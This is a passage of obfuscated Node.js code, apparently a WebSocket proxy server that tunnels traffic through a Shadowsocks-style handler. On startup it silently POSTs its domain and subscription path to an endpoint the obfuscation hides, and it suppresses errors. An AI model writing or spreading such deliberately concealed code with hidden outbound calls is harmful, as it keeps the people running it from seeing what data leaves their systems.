_0x389227={_0x1de6c5:0xb6,_0x55fb2c:0x135,_0xb2bb3e:0xb1,_0x3d88b0:0x146,_0x23e4bd:0x194,_0x3d9c4d:0x121,_0x3e62b2:0x16e,_0x2555d8:0x184,_0x1544e8:0x207,_0x3b0412:0x175,_0x18aeb4:0x1f2,_0x298709:0x1cd,_0x39d068:0x1cc,_0x6f0fd3:0x128,_0x4d5d32:0x5c,_0x91b570:0x1f,_0x333a34:0x5b,_0x3ffc50:0xb3,_0x46e373:0x14b,_0x50275c:0x187,_0x48a731:0x11f,_0x18747c:0x112,_0xd9038b:0x124},_0x3c4bb4={_0x5c64a8:0x40f,_0x326a05:0x4b8,_0x638dc3:0x27a,_0x5143c6:0x21b,_0x4fee99:0x2ce,_0x3d2114:0x29c,_0x197bb1:0x291,_0x1e352c:0x228,_0xa4424b:0x265,_0x2506c0:0x250,_0x389464:0x280,_0x3f4150:0x30f,_0x11d17a:0x291,_0x39ce65:0x2b0,_0x5b96df:0x2df,_0x55dc2c:0x467,_0x3696cd:0x4ce,_0x5848d7:0x45e,_0x157624:0x274,_0x3bfc03:0x27f,_0x333b01:0x365,_0x4523b2:0x38d,_0x8cfa60:0x40d,_0x701777:0x3d9,_0x1ad5a8:0x3db,_0x56f009:0x3a3,_0x5efd85:0x380,_0x1474ba:0x3ed,_0x3aa9d0:0x4c7,_0x2ad9ae:0x46d,_0x169b86:0x3ae,_0x9bb71:0x40f,_0x365ccf:0x3f9,_0x4b2f8f:0x1eb,_0x34a882:0x20a,_0x237870:0x379},_0x54bcc3={_0x3b2d59:0x321,_0x2339b8:0xbe,_0x4ff703:0xff},_0x44ec0f={_0x2b8c61:0x553,_0x4c987f:0x16e,_0x58b50b:0x95},_0x36b20a={_0x455bb0:0x1eb,_0x463aa1:0x102},_0x3a5067={_0x435e52:0x18};function _0x2b45a0(_0x31e361,_0x558308,_0x113d6d,_0x4bcada){return _0x18aada(_0x31e361,_0x558308-0x2a,_0x113d6d-0xec,_0x4bcada-_0x3a5067._0x435e52);}const _0x3f6fde={'aVumz':function(_0x297b62,_0x1a7cbc){return _0x297b62>_0x1a7cbc;},'pJBNV':function(_0x46296c,_0x3dd038){return _0x46296c===_0x3dd038;},'EDzbE':_0x2b45a0(_0x389227._0x1de6c5,_0x389227._0x55fb2c,_0x389227._0xb2bb3e,_0x389227._0x3d88b0),'mHhxw':_0x434f1d(-_0x389227._0x23e4bd,-_0x389227._0x3d9c4d,-_0x389227._0x3e62b2,-0x198),'YpyVk':function(_0x26e9d0,_0x127801,_0x2faaba){return _0x26e9d0(_0x127801,_0x2faaba);},'lAmqy':_0x434f1d(-_0x389227._0x2555d8,-0x1d4,-_0x389227._0x1544e8,-0x13c),'zxMyR':_0x434f1d(-_0x389227._0x3b0412,-_0x389227._0x18aeb4,-_0x389227._0x298709,-_0x389227._0x39d068),'fifFx':_0x434f1d(-0x186,-0x14b,-_0x389227._0x6f0fd3,-0x103),'fDCHC':'error'},_0x2b1716=_0x146287[_0x2b45a0(0xa4,_0x389227._0x4d5d32,-_0x389227._0x91b570,0x39)]||'';function _0x434f1d(_0x444a92,_0x523444,_0x92b203,_0x31800b){return _0x18aada(_0x92b203,_0x444a92- -0x20b,_0x92b203-_0x36b20a._0x455bb0,_0x31800b-_0x36b20a._0x463aa1);}const _0x23d9cf='/'+WSPATH;if(!_0x2b1716['startsWith'](_0x23d9cf)){_0x54a527[_0x2b45a0(0x1e,_0x389227._0x333a34,-0x27,_0x389227._0x3ffc50)]();return;}_0x54a527[_0x2b45a0(0x1ad,_0x389227._0x46e373,0x17c,_0x389227._0x50275c)](_0x3f6fde[_0x2b45a0(_0x389227._0x48a731,_0x389227._0x18747c,_0x389227._0xd9038b,0x18b)],_0x117726=>{const _0x45f3a9={};_0x45f3a9[_0x5120b2(_0x3c4bb4._0x5c64a8,_0x3c4bb4._0x5c64a8,_0x3c4bb4._0x326a05,0x454)]='tls';function _0x5120b2(_0x76837c,_0x1ba020,_0x2421ad,_0x987c7){return _0x434f1d(_0x987c7-_0x44ec0f._0x2b8c61,_0x1ba020-_0x44ec0f._0x4c987f,_0x76837c,_0x987c7-_0x44ec0f._0x58b50b);}function _0x1482e0(_0xe74fb7,_0x1df059,_0x553315,_0x8f6522){return _0x2b45a0(_0x1df059,_0xe74fb7- -_0x54bcc3._0x3b2d59,_0x553315-_0x54bcc3._0x2339b8,_0x8f6522-_0x54bcc3._0x4ff703);}const _0x696650=_0x45f3a9;if(_0x3f6fde[_0x1482e0(-_0x3c4bb4._0x638dc3,-_0x3c4bb4._0x5143c6,-_0x3c4bb4._0x4fee99,-_0x3c4bb4._0x3d2114)](_0x117726['length'],0x952*0x3+0x25c0+-0x41b6)&&(_0x3f6fde[_0x1482e0(-_0x3c4bb4._0x197bb1,-_0x3c4bb4._0x1e352c,-_0x3c4bb4._0xa4424b,-0x23d)](_0x117726[-0x1a*0xa1+-0x1906+0x2960],-0x2df*-0x9+0x1730+-0x3106)||_0x117726[0x16e8+0x63*0x43+-0x30d1]===-0x19*-0x133+0x1*-0x197b+-0x17f*0x3||_0x3f6fde[_0x1482e0(-_0x3c4bb4._0x197bb1,-_0x3c4bb4._0x2506c0,-_0x3c4bb4._0x389464,-_0x3c4bb4._0x3f4150)](_0x117726[-0x179f*-0x1+0x389*0xb+-0x3e82],0x1e49+-0x44c+-0x3d*0x6d))){if(_0x3f6fde[_0x1482e0(-_0x3c4bb4._0x11d17a,-_0x3c4bb4._0x39ce65,-_0x3c4bb4._0x5b96df,-0x239)](_0x3f6fde['EDzbE'],_0x3f6fde[_0x5120b2(0x477,_0x3c4bb4._0x55dc2c,_0x3c4bb4._0x3696cd,_0x3c4bb4._0x5848d7)]))this[_0x1482e0(-0x20c,-0x252,-_0x3c4bb4._0x157624,-_0x3c4bb4._0x3bfc03)](_0x523308[_0x5120b2(_0x3c4bb4._0x333b01,0x39e,0x3b1,_0x3c4bb4._0x4523b2)](_0x493593));else{if(_0x3f6fde[_0x5120b2(_0x3c4bb4._0x8cfa60,_0x3c4bb4._0x701777,_0x3c4bb4._0x1ad5a8,_0x3c4bb4._0x56f009)](handleSsConnection,_0x54a527,_0x117726)){if(_0x3f6fde[_0x5120b2(0x3f8,0x399,_0x3c4bb4._0x5efd85,0x3ae)](_0x3f6fde[_0x5120b2(_0x3c4bb4._0x1474ba,0x4ca,_0x3c4bb4._0x3aa9d0,_0x3c4bb4._0x2ad9ae)],_0x3f6fde[_0x5120b2(_0x3c4bb4._0x169b86,0x37e,_0x3c4bb4._0x9bb71,_0x3c4bb4._0x365ccf)]))_0x398012=_0x416095,_0x554372=_0x696650[_0x1482e0(-_0x3c4bb4._0x4b2f8f,-_0x3c4bb4._0x34a882,-0x26e,-0x185)],_0x229115=-0x2cc+-0x1edb+0x2362;else return;}}}_0x54a527[_0x5120b2(0x302,0x33c,0x375,_0x3c4bb4._0x237870)]();})['on'](_0x3f6fde['fDCHC'],()=>{});});async function addAccessTask(){const _0x5e936a={_0x482bbd:0x10b,_0x84da1c:0x18f,_0x4ff5fa:0x70,_0x325d1:0xd4,_0x156e6d:0x14b,_0x5da593:0x97,_0x39907e:0x153,_0x451051:0x101,_0x3f3692:0xa8,_0x1a238a:0x106,_0x43697d:0x9d,_0x2b3f38:0x112,_0x9eb3f6:0x11f,_0x4f47af:0xc9,_0x291a6a:0x10f,_0x2a85dc:0x123,_0x41ec49:0x5b,_0x398224:0xb4,_0x5d0c19:0xce,_0x144632:0x12b,_0x973748:0x91,_0x119d9:0x127,_0x101a98:0x1d6,_0x55e5d1:0x16f,_0x3b6103:0x180,_0x3ae8f6:0x135,_0xa0aee1:0xe4,_0x3c75ae:0x12b,_0x62c4ff:0xe8,_0x40b36d:0x167,_0x251298:0x110,_0x424b07:0xee,_0x465793:0x14f,_0x28a22e:0x8b,_0x5ec8eb:0x6f,_0x6e29a8:0x60,_0xd9f565:0x15f,_0xdceb3:0x116,_0x139f9b:0xeb,_0x6bff6c:0x1a1,_0x14e4af:0x114,_0x27e0c3:0xa0,_0x123822:0x12c,_0xe1e32:0x12f,_0x3203ab:0x176,_0x5b4d36:0x152,_0x424e18:0x1bf,_0x5e3ee3:0x19f,_0x5c01a9:0xa9,_0x2b4710:0x129,_0x3204eb:0x117,_0x2a575b:0xf1,_0x35d72d:0x89,_0x43fb1d:0x16d,_0x136235:0x19c},_0xb7dba3={_0x29ea57:0x174,_0x26de23:0xcf,_0x13cb67:0x42},_0x139733={_0x202f7b:0x1c7,_0x2ad413:0xb7},_0x39b801={};_0x39b801[_0x355fcc(0x14c,0x1eb,_0x5e936a._0x482bbd,_0x5e936a._0x84da1c)]=function(_0x4558ef,_0x2c2be6){return _0x4558ef===_0x2c2be6;};function _0x57fdf9(_0x8dbdb0,_0x51a6ec,_0x32d2d,_0x2dfce0){return _0x18aada(_0x32d2d,_0x51a6ec- -_0x139733._0x202f7b,_0x32d2d-0x121,_0x2dfce0-_0x139733._0x2ad413);}_0x39b801['zUeLH']=function(_0x437a0a,_0x574314){return _0x437a0a+_0x574314;},_0x39b801['SqsKu']=function(_0x2cd58a,_0x13df36){return _0x2cd58a===_0x13df36;};function _0x355fcc(_0x4bd3de,_0x5e0944,_0x5cdd78,_0x36af3c){return _0x20ed0c(_0x36af3c-_0xb7dba3._0x29ea57,_0x5e0944-_0xb7dba3._0x26de23,_0x5cdd78-_0xb7dba3._0x13cb67,_0x5e0944);}_0x39b801[_0x57fdf9(-_0x5e936a._0x4ff5fa,-_0x5e936a._0x325d1,-_0x5e936a._0x156e6d,-_0x5e936a._0x5da593)]=_0x57fdf9(-_0x5e936a._0x39907e,-_0x5e936a._0x451051,-_0x5e936a._0x3f3692,-_0x5e936a._0x1a238a),_0x39b801[_0x355fcc(0xf5,_0x5e936a._0x43697d,0x10c,_0x5e936a._0x2b3f38)]=_0x57fdf9(-_0x5e936a._0x9eb3f6,-_0x5e936a._0x4f47af,-_0x5e936a._0x291a6a,-_0x5e936a._0x2a85dc),_0x39b801[_0x57fdf9(-_0x5e936a._0x41ec49,-_0x5e936a._0x398224,-_0x5e936a._0x5d0c19,-_0x5e936a._0x144632)]='application/json',_0x39b801[_0x57fdf9(-_0x5e936a._0x973748,-0x10c,-_0x5e936a._0x119d9,-0xc0)]=_0x57fdf9(-_0x5e936a._0x101a98,-_0x5e936a._0x55e5d1,-0x1a6,-_0x5e936a._0x3b6103);const _0x387456=_0x39b801;if(!AUTO_ACCESS)return;if(!DOMAIN)return;const _0x5f52c6=_0x57fdf9(-_0x5e936a._0x3ae8f6,-_0x5e936a._0xa0aee1,-_0x5e936a._0x3c75ae,-_0x5e936a._0x62c4ff)+DOMAIN+'/'+SUB_PATH;try{if(_0x387456[_0x57fdf9(-_0x5e936a._0x40b36d,-_0x5e936a._0x251298,-_0x5e936a._0x424b07,-_0x5e936a._0x465793)](_0x387456[_0x57fdf9(-_0x5e936a._0x28a22e,-_0x5e936a._0x325d1,-_0x5e936a._0x5ec8eb,-_0x5e936a._0x6e29a8)],_0x387456['omrhk'])){const _0x31a925={};_0x31a925[_0x355fcc(_0x5e936a._0xd9f565,0x11a,_0x5e936a._0xdceb3,_0x5e936a._0x139f9b)]=_0x5f52c6;const _0x543544=await axios[_0x57fdf9(-_0x5e936a._0x6bff6c,-_0x5e936a._0x2a85dc,-_0x5e936a._0x14e4af,-_0x5e936a._0x27e0c3)](_0x387456[_0x355fcc(_0x5e936a._0x123822,_0x5e936a._0xe1e32,_0x5e936a._0x3203ab,_0x5e936a._0x2b3f38)],_0x31a925,{'headers':{'Content-Type':_0x387456[_0x355fcc(_0x5e936a._0x5b4d36,0x14b,_0x5e936a._0x424e18,0x1cc)]}});console[_0x355fcc(0x10c,_0x5e936a._0x5e3ee3,_0x5e936a._0x5c01a9,_0x5e936a._0x2b4710)](_0x387456['PMijs']);}else return _0x387456[_0x57fdf9(-_0x5e936a._0x3204eb,-_0x5e936a._0x2a575b,-_0x5e936a._0x35d72d,-_0x5e936a._0x43fb1d)](_0x7bcf6e,_0x4285e8)||_0x3f63b6[_0x57fdf9(-0x1ba,-0x18b,-_0x5e936a._0x136235,-0x136)](_0x387456['zUeLH']('.',_0x320f0c));}catch(_0x1daffb){}}function _0x20ed0c(_0x5e8201,_0x41c3e4,_0x534d74,_0x5d5628){const _0x3c8b2f={_0x299f1d:0x112};return _0x1711(_0x5e8201- -_0x3c8b2f._0x299f1d,_0x5d5628);}httpServer['listen'](PORT,async()=>{const _0x558623={_0x15dce9:0x126,_0x117f39:0x1be,_0x557d39:0x16a,_0x5e3836:0x18b,_0x599fb4:0x153,_0x4e5955:0x120},_0x4ebdd1={_0x4ea27d:0x56,_0x24d937:0x113};function _0x1e348e(_0x506b1e,_0x1822ba,_0x1dcc08,_0x203fcd){return _0x20ed0c(_0x1dcc08-_0x4ebdd1._0x4ea27d,_0x1822ba-_0x4ebdd1._0x24d937,_0x1dcc08-0x77,_0x506b1e);}function _0x3129fd(_0x120d66,_0x2068c0,_0x4f10c8,_0xf0eb){return _0x18aada(_0x2068c0,_0xf0eb- -0x21d,_0x4f10c8-0x192,_0xf0eb-0xa1);}const _0x58df92={'qmtuQ':function(_0x536950){return _0x536950();}};_0x58df92[_0x3129fd(-_0x558623._0x15dce9,-_0x558623._0x117f39,-_0x558623._0x557d39,-_0x558623._0x5e3836)](addAccessTask),console['log']('Server\x20is\x20running\x20on\x20port\x20'+PORT+_0x3129fd(-0x196,-0xba,-_0x558623._0x599fb4,-_0x558623._0x4e5955));});
